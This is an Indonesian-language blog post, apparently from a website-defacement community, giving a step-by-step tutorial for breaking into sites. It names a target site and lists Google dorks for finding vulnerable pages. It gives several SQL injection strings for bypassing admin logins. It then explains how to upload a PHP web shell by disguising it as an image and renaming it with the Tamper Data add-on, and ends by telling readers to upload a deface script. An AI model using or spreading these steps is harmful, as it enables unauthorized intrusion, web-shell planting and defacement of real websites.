hello hacker, defacer, cracker, script kiddies or lamer :v
kali ini ane mau share tutorial cara deface dengan bypass admin login dan tamper data. oke langsung simak aja langkah langkah nya...
target : http://bssbunker.net/
- Alat perang :
- google dork
- shell backdoor
- tamper data (firefox)
kalo belom ada tamper data ente ke Add-ons, terus ente download tamper data nya.
- dork :
inurl:"/gallery.php" site:id
inurl:"/about.php" site:id
use ur brian - langsung ente search di google, ini ane pake inurl:"gallery.php" site:net
- kalo udah dapet target, ente langsung ke ../admin
terus ente inject pake ini, pilih salah satu aja
'=''or'
' or true--+
' or '1=1
' or '1'='1
' or 1='1
x' or 'x'='x
ex : ane pake '=''or'
username : '=''or'
password : '=''or'
- bisa kan? kado udah masuk, tinggal upload shell backdoor
- ente pergi ke gallery / banner / image / atau yg laen, tempat upload image
- ente edit gallery / tambah gallery,
shell nya ente rename dulu, jadi shell.php.jpg
- ente buka tamper data nya > ente klik Start Tamper
- ente save gallery yang tadi > Tamper
- ente cari shell.php.jpg yang ente upload tadi, ente hapus .jpg nya, jadi shell.php > klik Oke
- buat load shell backdoor nya ente drag aja, atau view image
- tadaaa....
bisa kan? tinggal upload script deface ente. jangan nebas index, buat web susah bego..
0 komentar
Posting Komentar